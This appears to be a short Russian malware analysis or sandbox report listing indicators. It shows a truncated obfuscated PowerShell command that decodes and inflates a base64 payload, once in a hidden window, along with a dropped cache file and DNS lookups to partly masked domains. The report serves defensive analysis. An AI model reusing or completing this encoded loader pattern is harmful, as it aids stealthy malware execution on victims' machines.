Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' ( nEW-obJeCt SYSTEM.IO.COMpreSsION.dEFlateStreaM([SYStEm.Io.mEmORyStREam] [SYstEm.coNverT]::frOMbAse64stRIng( 'RVDbagIxEP2VfQhEsZv0oVAwLAi1F6QthUXE0pdJdupGs0nMjm5F/PeuUizM0zlzLjPMfj4XHrs86DUay...
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\dyps348i\config14[1].txt
- DNS ASK pr###rplano.org
- DNS ASK av##ant.com
- DNS ASK mu##thai.pl
- DNS ASK jm###sical.jp
- DNS ASK na###amicky.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' ( nEW-obJeCt SYSTEM.IO.COMpreSsION.dEFlateStreaM([SYStEm.Io.mEmORyStREam] [SYstEm.coNverT]::frOMbAse64stRIng( 'RVDbagIxEP2VfQhEsZv0oVAwLAi1F6QthUXE0pdJdupGs0nMjm5F/PeuUizM0zlzLjPMfj4XHrs86DUay... (со скрытым окном)